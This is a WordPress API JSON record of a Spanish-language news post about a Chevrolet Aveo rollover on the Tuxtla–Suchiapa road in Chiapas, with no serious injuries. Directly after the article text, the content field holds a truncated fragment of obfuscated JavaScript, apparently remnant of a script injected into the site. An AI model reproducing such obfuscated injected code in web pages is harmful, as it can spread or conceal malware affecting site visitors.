{"id":9382,"date":"2023-04-04T02:17:05","date_gmt":"2023-04-04T02:17:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9382"},"modified":"2023-04-04T02:17:06","modified_gmt":"2023-04-04T02:17:06","slug":"vuelca-aveo-en-el-tramo-tuxtla-suchiapa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9382","title":{"rendered":"Vuelca Aveo en el tramo Tuxtla-Suchiapa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"648\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1680574571327.jpg\" alt=\"\" class=\"wp-image-9383\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1680574571327.jpg 648w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1680574571327-203x300.jpg 203w\" sizes=\"auto, (max-width: 648px) 100vw, 648px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 3 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este lunes se registr\u00f3 una Volcadura en el tamo Tuxtla- Suchiapa dejando cuantiosos da\u00f1os materiales.Este accidente ocurri\u00f3 cuando, el Chevrolet Aveo de color blanco circulaba de Norte a Sur cuando una llanta se revent\u00f3, lo que provoc\u00f3 que, perdiera el control, chocara contra una piedra y volcara a la altura del Kil\u00f3metro 7.5.A pesar de lo aparatoso del siniestro, no hubo personas lesionadas.Al lugar arribaron rescatistas voluntarios para apoyar al conductor que result\u00f3 con heridas leves.Testigos relataron que el coche circulaba a exceso de velocidad y tras volcar cay\u00f3 sobre unos pilares de concreto.Elementos de tr\u00e1nsito municipal ordenaron el levantamiento de la unidad para llevarla a un corral\u00f3n para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 3 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este lunes se registr\u00f3 una Volcadura en el tamo Tuxtla- Suchiapa dejando cuantiosos da\u00f1os materiales.Este accidente ocurri\u00f3 cuando, el Chevrolet Aveo de color blanco circulaba de Norte a Sur cuando una llanta se revent\u00f3, lo que provoc\u00f3 que, perdiera el control, chocara contra una piedra &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9383,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9382","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9382","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9382"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9382\/revisions"}],"predecessor-version":[{"id":9384,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9382\/revisions\/9384"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9383"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9382"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9382"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}